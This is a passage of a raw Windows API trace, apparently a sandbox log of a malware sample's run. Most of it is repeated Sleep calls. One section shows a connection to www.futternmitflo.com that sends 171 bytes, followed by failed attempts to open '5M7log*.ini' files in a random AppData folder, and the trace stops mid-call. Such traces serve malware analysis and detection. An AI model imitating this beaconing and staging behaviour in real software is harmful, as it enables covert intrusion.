(dwMilliseconds=0x7d0) [0197.833] Sleep (dwMilliseconds=0x7d0) [0197.834] Sleep (dwMilliseconds=0x7d0) [0197.836] Sleep (dwMilliseconds=0x7d0) [0197.837] Sleep (dwMilliseconds=0x7d0) [0197.839] Sleep (dwMilliseconds=0x7d0) [0197.840] Sleep (dwMilliseconds=0x7d0) [0197.842] Sleep (dwMilliseconds=0x7d0) [0197.844] Sleep (dwMilliseconds=0x7d0) [0197.845] Sleep (dwMilliseconds=0x7d0) [0197.847] Sleep (dwMilliseconds=0x7d0) [0197.848] Sleep (dwMilliseconds=0x7d0) [0197.851] Sleep (dwMilliseconds=0x7d0) [0197.852] Sleep (dwMilliseconds=0x7d0) [0197.863] Sleep (dwMilliseconds=0x7d0) [0197.865] Sleep (dwMilliseconds=0x7d0) [0197.867] Sleep (dwMilliseconds=0x7d0) [0197.869] Sleep (dwMilliseconds=0x7d0) [0197.871] Sleep (dwMilliseconds=0x7d0) [0197.874] Sleep (dwMilliseconds=0x7d0) [0197.875] Sleep (dwMilliseconds=0x7d0) [0197.877] Sleep (dwMilliseconds=0x7d0) [0197.878] Sleep (dwMilliseconds=0x7d0) [0197.880] Sleep (dwMilliseconds=0x7d0) [0197.881] Sleep (dwMilliseconds=0x7d0) [0197.882] Sleep (dwMilliseconds=0x7d0) [0197.887] Sleep (dwMilliseconds=0x7d0) [0197.891] Sleep (dwMilliseconds=0x7d0) [0197.895] Sleep (dwMilliseconds=0x7d0) [0197.897] Sleep (dwMilliseconds=0x7d0) [0197.898] Sleep (dwMilliseconds=0x7d0) [0197.900] Sleep (dwMilliseconds=0x7d0) [0197.901] Sleep (dwMilliseconds=0x7d0) [0197.904] Sleep (dwMilliseconds=0x7d0) [0197.907] Sleep (dwMilliseconds=0x7d0) [0197.908] Sleep (dwMilliseconds=0x7d0) [0197.909] Sleep (dwMilliseconds=0x7d0) [0197.911] Sleep (dwMilliseconds=0x7d0) [0197.912] Sleep (dwMilliseconds=0x7d0) [0197.914] Sleep (dwMilliseconds=0x7d0) [0197.917] Sleep (dwMilliseconds=0x7d0) [0197.919] Sleep (dwMilliseconds=0x7d0) [0197.920] Sleep (dwMilliseconds=0x7d0) [0197.922] Sleep (dwMilliseconds=0x7d0) [0197.923] Sleep (dwMilliseconds=0x7d0) [0197.925] Sleep (dwMilliseconds=0x7d0) [0197.926] Sleep (dwMilliseconds=0x7d0) [0197.928] Sleep (dwMilliseconds=0x7d0) [0197.929] Sleep (dwMilliseconds=0x7d0) [0197.931] Sleep (dwMilliseconds=0x7d0) [0197.932] Sleep (dwMilliseconds=0x7d0) [0197.934] Sleep (dwMilliseconds=0x7d0) [0197.935] Sleep (dwMilliseconds=0x7d0) [0197.937] Sleep (dwMilliseconds=0x7d0) [0197.940] Sleep (dwMilliseconds=0x7d0) [0197.941] Sleep (dwMilliseconds=0x7d0) [0197.942] Sleep (dwMilliseconds=0x7d0) [0197.944] Sleep (dwMilliseconds=0x7d0) [0197.945] Sleep (dwMilliseconds=0x7d0) [0197.949] Sleep (dwMilliseconds=0x7d0) [0197.951] Sleep (dwMilliseconds=0x7d0) [0197.952] Sleep (dwMilliseconds=0x7d0) [0197.954] Sleep (dwMilliseconds=0x7d0) [0197.955] Sleep (dwMilliseconds=0x7d0) [0197.957] Sleep (dwMilliseconds=0x7d0) [0197.963] Sleep (dwMilliseconds=0x7d0) [0197.967] Sleep (dwMilliseconds=0x7d0) [0197.969] Sleep (dwMilliseconds=0x7d0) [0197.971] Sleep (dwMilliseconds=0x7d0) [0197.972] Sleep (dwMilliseconds=0x7d0) [0197.974] Sleep (dwMilliseconds=0x7d0) [0197.975] Sleep (dwMilliseconds=0x7d0) [0197.977] Sleep (dwMilliseconds=0x7d0) [0197.978] Sleep (dwMilliseconds=0x7d0) [0197.979] Sleep (dwMilliseconds=0x7d0) [0197.982] Sleep (dwMilliseconds=0x7d0) [0197.983] Sleep (dwMilliseconds=0x7d0) [0197.984] Sleep (dwMilliseconds=0x7d0) [0197.986] Sleep (dwMilliseconds=0x7d0) [0197.988] Sleep (dwMilliseconds=0x7d0) [0197.989] Sleep (dwMilliseconds=0x7d0) [0197.990] Sleep (dwMilliseconds=0x7d0) [0197.992] Sleep (dwMilliseconds=0x7d0) [0197.994] Sleep (dwMilliseconds=0x7d0) [0197.996] Sleep (dwMilliseconds=0x7d0) [0197.997] Sleep (dwMilliseconds=0x7d0) [0197.999] Sleep (dwMilliseconds=0x7d0) [0198.000] Sleep (dwMilliseconds=0x7d0) [0198.001] Sleep (dwMilliseconds=0x7d0) [0198.005] Sleep (dwMilliseconds=0x7d0) [0198.006] Sleep (dwMilliseconds=0x7d0) [0198.007] Sleep (dwMilliseconds=0x7d0) [0198.009] Sleep (dwMilliseconds=0x7d0) [0198.010] Sleep (dwMilliseconds=0x7d0) [0198.012] Sleep (dwMilliseconds=0x7d0) [0198.013] Sleep (dwMilliseconds=0x7d0) [0198.015] Sleep (dwMilliseconds=0x7d0) [0198.016] Sleep (dwMilliseconds=0x7d0) [0198.018] Sleep (dwMilliseconds=0x7d0) [0198.019] Sleep (dwMilliseconds=0x7d0) [0198.021] Sleep (dwMilliseconds=0x7d0) [0198.022] Sleep (dwMilliseconds=0x7d0) [0198.027] Sleep (dwMilliseconds=0x7d0) [0198.028] Sleep (dwMilliseconds=0x7d0) [0198.029] Sleep (dwMilliseconds=0x7d0) [0198.031] Sleep (dwMilliseconds=0x7d0) [0198.032] Sleep (dwMilliseconds=0x7d0) [0198.034] Sleep (dwMilliseconds=0x7d0) [0198.037] Sleep (dwMilliseconds=0x7d0) [0198.039] Sleep (dwMilliseconds=0x7d0) [0198.041] Sleep (dwMilliseconds=0x7d0) [0198.043] Sleep (dwMilliseconds=0x7d0) [0198.044] Sleep (dwMilliseconds=0x7d0) [0198.045] Sleep (dwMilliseconds=0x7d0) [0198.047] Sleep (dwMilliseconds=0x7d0) [0198.048] Sleep (dwMilliseconds=0x7d0) [0198.050] Sleep (dwMilliseconds=0x7d0) [0198.051] Sleep (dwMilliseconds=0x7d0) [0198.053] Sleep (dwMilliseconds=0x7d0) [0198.054] Sleep (dwMilliseconds=0x7d0) [0198.056] Sleep (dwMilliseconds=0x7d0) [0198.060] Sleep (dwMilliseconds=0x7d0) [0198.061] Sleep (dwMilliseconds=0x7d0) [0198.062] Sleep (dwMilliseconds=0x7d0) [0198.064] Sleep (dwMilliseconds=0x7d0) [0198.065] Sleep (dwMilliseconds=0x7d0) [0198.067] Sleep (dwMilliseconds=0x7d0) [0198.071] Sleep (dwMilliseconds=0x7d0) [0198.073] Sleep (dwMilliseconds=0x7d0) [0198.074] Sleep (dwMilliseconds=0x7d0) [0198.075] Sleep (dwMilliseconds=0x7d0) [0198.077] Sleep (dwMilliseconds=0x7d0) [0198.078] Sleep (dwMilliseconds=0x7d0) [0198.083] Sleep (dwMilliseconds=0x7d0) [0198.084] Sleep (dwMilliseconds=0x7d0) [0198.085] Sleep (dwMilliseconds=0x7d0) [0198.087] Sleep (dwMilliseconds=0x7d0) [0198.088] Sleep (dwMilliseconds=0x7d0) [0198.090] Sleep (dwMilliseconds=0x7d0) [0198.091] Sleep (dwMilliseconds=0x7d0) [0198.093] Sleep (dwMilliseconds=0x7d0) [0198.094] Sleep (dwMilliseconds=0x7d0) [0198.096] Sleep (dwMilliseconds=0x7d0) [0198.097] Sleep (dwMilliseconds=0x7d0) [0198.099] Sleep (dwMilliseconds=0x7d0) [0198.100] Sleep (dwMilliseconds=0x7d0) [0198.105] Sleep (dwMilliseconds=0x7d0) [0198.106] Sleep (dwMilliseconds=0x7d0) [0198.108] Sleep (dwMilliseconds=0x7d0) [0198.109] Sleep (dwMilliseconds=0x7d0) [0198.110] Sleep (dwMilliseconds=0x7d0) [0198.116] Sleep (dwMilliseconds=0x7d0) [0198.117] Sleep (dwMilliseconds=0x7d0) [0198.118] Sleep (dwMilliseconds=0x7d0) [0198.120] Sleep (dwMilliseconds=0x7d0) [0198.122] Sleep (dwMilliseconds=0x7d0) [0198.126] Sleep (dwMilliseconds=0x7d0) [0198.128] Sleep (dwMilliseconds=0x7d0) [0198.130] Sleep (dwMilliseconds=0x7d0) [0198.131] Sleep (dwMilliseconds=0x7d0) [0198.133] Sleep (dwMilliseconds=0x7d0) [0198.138] Sleep (dwMilliseconds=0x7d0) [0198.139] Sleep (dwMilliseconds=0x7d0) [0198.141] Sleep (dwMilliseconds=0x7d0) [0198.142] Sleep (dwMilliseconds=0x7d0) [0198.144] Sleep (dwMilliseconds=0x7d0) [0198.146] Sleep (dwMilliseconds=0x7d0) [0198.148] Sleep (dwMilliseconds=0x7d0) [0198.150] Sleep (dwMilliseconds=0x7d0) [0198.151] Sleep (dwMilliseconds=0x7d0) [0198.153] Sleep (dwMilliseconds=0x7d0) [0198.154] Sleep (dwMilliseconds=0x7d0) [0198.159] Sleep (dwMilliseconds=0x7d0) [0198.162] Sleep (dwMilliseconds=0x7d0) [0198.163] Sleep (dwMilliseconds=0x7d0) [0198.164] Sleep (dwMilliseconds=0x7d0) [0198.166] Sleep (dwMilliseconds=0x7d0) [0198.170] Sleep (dwMilliseconds=0x7d0) [0198.171] Sleep (dwMilliseconds=0x7d0) [0198.173] Sleep (dwMilliseconds=0x7d0) [0198.174] Sleep (dwMilliseconds=0x7d0) [0198.176] Sleep (dwMilliseconds=0x7d0) [0198.177] Sleep (dwMilliseconds=0x7d0) [0198.179] Sleep (dwMilliseconds=0x7d0) [0198.181] Sleep (dwMilliseconds=0x7d0) [0198.182] Sleep (dwMilliseconds=0x7d0) [0198.184] Sleep (dwMilliseconds=0x7d0) [0198.185] Sleep (dwMilliseconds=0x7d0) [0198.186] Sleep (dwMilliseconds=0x7d0) [0198.188] Sleep (dwMilliseconds=0x7d0) [0198.192] Sleep (dwMilliseconds=0x7d0) [0198.194] Sleep (dwMilliseconds=0x7d0) [0198.195] Sleep (dwMilliseconds=0x7d0) [0198.197] Sleep (dwMilliseconds=0x7d0) [0198.198] Sleep (dwMilliseconds=0x7d0) [0198.255] Sleep (dwMilliseconds=0x7d0) [0198.257] Sleep (dwMilliseconds=0x7d0) [0198.259] Sleep (dwMilliseconds=0x7d0) [0198.261] Sleep (dwMilliseconds=0x7d0) [0198.263] Sleep (dwMilliseconds=0x7d0) [0198.264] Sleep (dwMilliseconds=0x7d0) [0198.269] Sleep (dwMilliseconds=0x7d0) [0198.270] Sleep (dwMilliseconds=0x7d0) [0198.271] Sleep (dwMilliseconds=0x7d0) [0198.273] Sleep (dwMilliseconds=0x7d0) [0198.274] Sleep (dwMilliseconds=0x7d0) [0198.276] Sleep (dwMilliseconds=0x7d0) [0198.279] Sleep (dwMilliseconds=0x7d0) [0198.281] Sleep (dwMilliseconds=0x7d0) [0198.282] Sleep (dwMilliseconds=0x7d0) [0198.284] Sleep (dwMilliseconds=0x7d0) [0198.293] Sleep (dwMilliseconds=0x7d0) [0198.300] Sleep (dwMilliseconds=0x7d0) [0198.301] Sleep (dwMilliseconds=0x7d0) [0198.303] Sleep (dwMilliseconds=0x7d0) [0198.305] Sleep (dwMilliseconds=0x7d0) [0198.309] Sleep (dwMilliseconds=0x7d0) [0198.311] Sleep (dwMilliseconds=0x7d0) [0198.312] Sleep (dwMilliseconds=0x7d0) [0198.314] Sleep (dwMilliseconds=0x7d0) [0198.316] Sleep (dwMilliseconds=0x7d0) [0198.317] Sleep (dwMilliseconds=0x7d0) [0198.319] Sleep (dwMilliseconds=0x7d0) [0198.320] Sleep (dwMilliseconds=0x7d0) [0198.322] Sleep (dwMilliseconds=0x7d0) [0198.323] Sleep (dwMilliseconds=0x7d0) [0198.325] Sleep (dwMilliseconds=0x7d0) [0198.326] Sleep (dwMilliseconds=0x7d0) [0198.330] Sleep (dwMilliseconds=0x7d0) [0198.331] Sleep (dwMilliseconds=0x7d0) [0198.333] Sleep (dwMilliseconds=0x7d0) [0198.334] Sleep (dwMilliseconds=0x7d0) [0198.336] Sleep (dwMilliseconds=0x7d0) [0198.337] Sleep (dwMilliseconds=0x7d0) [0198.341] Sleep (dwMilliseconds=0x7d0) [0198.343] Sleep (dwMilliseconds=0x7d0) [0198.345] Sleep (dwMilliseconds=0x7d0) [0198.346] Sleep (dwMilliseconds=0x7d0) [0198.351] Sleep (dwMilliseconds=0x7d0) [0198.397] Sleep (dwMilliseconds=0x7d0) [0198.409] Sleep (dwMilliseconds=0x7d0) [0198.412] Sleep (dwMilliseconds=0x7d0) [0198.413] Sleep (dwMilliseconds=0x7d0) [0198.414] Sleep (dwMilliseconds=0x7d0) [0198.418] Sleep (dwMilliseconds=0x7d0) [0198.419] Sleep (dwMilliseconds=0x7d0) [0198.421] Sleep (dwMilliseconds=0x7d0) [0198.423] Sleep (dwMilliseconds=0x7d0) [0198.424] Sleep (dwMilliseconds=0x7d0) [0198.429] Sleep (dwMilliseconds=0x7d0) [0198.430] Sleep (dwMilliseconds=0x7d0) [0198.432] Sleep (dwMilliseconds=0x7d0) [0198.433] Sleep (dwMilliseconds=0x7d0) [0198.435] Sleep (dwMilliseconds=0x7d0) [0198.436] Sleep (dwMilliseconds=0x7d0) [0198.440] Sleep (dwMilliseconds=0x7d0) [0198.441] Sleep (dwMilliseconds=0x7d0) [0198.443] Sleep (dwMilliseconds=0x7d0) [0198.444] Sleep (dwMilliseconds=0x7d0) [0198.446] Sleep (dwMilliseconds=0x7d0) [0198.447] Sleep (dwMilliseconds=0x7d0) [0198.449] Sleep (dwMilliseconds=0x7d0) [0198.450] Sleep (dwMilliseconds=0x7d0) [0198.452] Sleep (dwMilliseconds=0x7d0) [0198.453] Sleep (dwMilliseconds=0x7d0) [0198.455] Sleep (dwMilliseconds=0x7d0) [0198.457] Sleep (dwMilliseconds=0x7d0) [0198.464] Sleep (dwMilliseconds=0x7d0) [0198.466] Sleep (dwMilliseconds=0x7d0) [0198.467] Sleep (dwMilliseconds=0x7d0) [0198.469] Sleep (dwMilliseconds=0x7d0) [0198.472] Sleep (dwMilliseconds=0x7d0) [0198.473] Sleep (dwMilliseconds=0x7d0) [0198.475] Sleep (dwMilliseconds=0x7d0) [0198.476] Sleep (dwMilliseconds=0x7d0) [0198.478] Sleep (dwMilliseconds=0x7d0) [0198.479] Sleep (dwMilliseconds=0x7d0) [0198.481] Sleep (dwMilliseconds=0x7d0) [0198.482] Sleep (dwMilliseconds=0x7d0) [0198.484] Sleep (dwMilliseconds=0x7d0) [0198.526] Sleep (dwMilliseconds=0x7d0) [0198.527] Sleep (dwMilliseconds=0x7d0) [0198.528] Sleep (dwMilliseconds=0x7d0) [0198.530] Sleep (dwMilliseconds=0x7d0) [0198.531] Sleep (dwMilliseconds=0x7d0) [0198.533] Sleep (dwMilliseconds=0x7d0) [0198.534] Sleep (dwMilliseconds=0x7d0) [0198.539] Sleep (dwMilliseconds=0x7d0) [0198.540] Sleep (dwMilliseconds=0x7d0) [0198.542] Sleep (dwMilliseconds=0x7d0) [0198.543] Sleep (dwMilliseconds=0x7d0) [0198.545] Sleep (dwMilliseconds=0x7d0) [0198.546] Sleep (dwMilliseconds=0x7d0) [0198.550] Sleep (dwMilliseconds=0x7d0) [0198.551] Sleep (dwMilliseconds=0x7d0) [0198.553] Sleep (dwMilliseconds=0x7d0) [0198.555] Sleep (dwMilliseconds=0x7d0) [0198.556] Sleep (dwMilliseconds=0x7d0) [0198.561] Sleep (dwMilliseconds=0x7d0) [0198.564] Sleep (dwMilliseconds=0x7d0) [0198.565] Sleep (dwMilliseconds=0x7d0) [0198.567] socket (af=2, type=1, protocol=6) returned 0x1ec0 [0198.599] getaddrinfo (in: pNodeName="www.futternmitflo.com", pServiceName="80", pHints=0x9e76818*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e76848 | out: ppResult=0x9e76848*=0xa05e7d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f929d0*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.25"), ai_next=0xa05e950*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92b10*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.24"), ai_next=0x0))) returned 0 [0198.674] connect (s=0x1ec0, name=0x9f929d0*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.25"), namelen=16) returned 0 [0198.697] send (s=0x1ec0, buf=0x82e10fa*, len=171, flags=0) returned 171 [0198.697] setsockopt (s=0x1ec0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0198.697] recv (in: s=0x1ec0, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 472 [0198.740] closesocket (s=0x1ec0) returned 0 [0198.741] Sleep (dwMilliseconds=0x7d0) [0198.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.743] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.743] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0198.743] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07820) returned 1 [0198.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.744] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.744] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.744] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e071f0) returned 1 [0198.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.744] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.744] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.744] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06fb0) returned 1 [0198.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.744] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.744] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.744] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0198.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.744] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.744] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.744] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0198.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.744] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.744] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.744] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07820) returned 1 [0198.745] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.745] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.745] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.745] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06fb0) returned 1 [0198.745] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.745] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.746] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.746] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e06fb0) returned 1 [0198.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.746] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: 